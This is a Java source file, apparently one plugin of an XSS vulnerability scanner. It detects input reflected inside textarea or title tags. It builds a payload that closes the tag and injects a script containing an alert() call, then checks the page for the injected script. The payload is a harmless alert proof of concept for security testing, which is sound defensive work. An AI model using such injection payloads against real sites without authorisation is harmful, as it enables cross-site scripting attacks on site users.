package com.vulnit.projects.xss.plugins;

import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

/**
 * Plugin to handle RCDATA tag (title and textarea)
 * 
 * @author rmillet
 * 
 */
public final class RcDataPlugin extends Plugin {
	private String scriptText;

	@Override
	public String getInitialPayload(Elements elements, String searchText) {
		for (Element element : elements) {
			String tagName = element.tagName();
			if ((tagName.equals("textarea") || tagName.equals("title"))
					&& element.ownText().contains(searchText)) {
				this.scriptText = "alert('" + Plugin.Tag + "')";
				return "</" + tagName + "><script>" + this.scriptText + "</script>";
			}
		}
		return null;
	}

	@Override
	public String getPayload() {
		return null;
	}

	@Override
	public boolean isInjectionSuccessful(Document document) {
		Elements elements = document.select("script");
		for (Element element : elements) {
			if (element.data().contains(scriptText)) {
				return true;
			}
		}
		return false;
	}

}
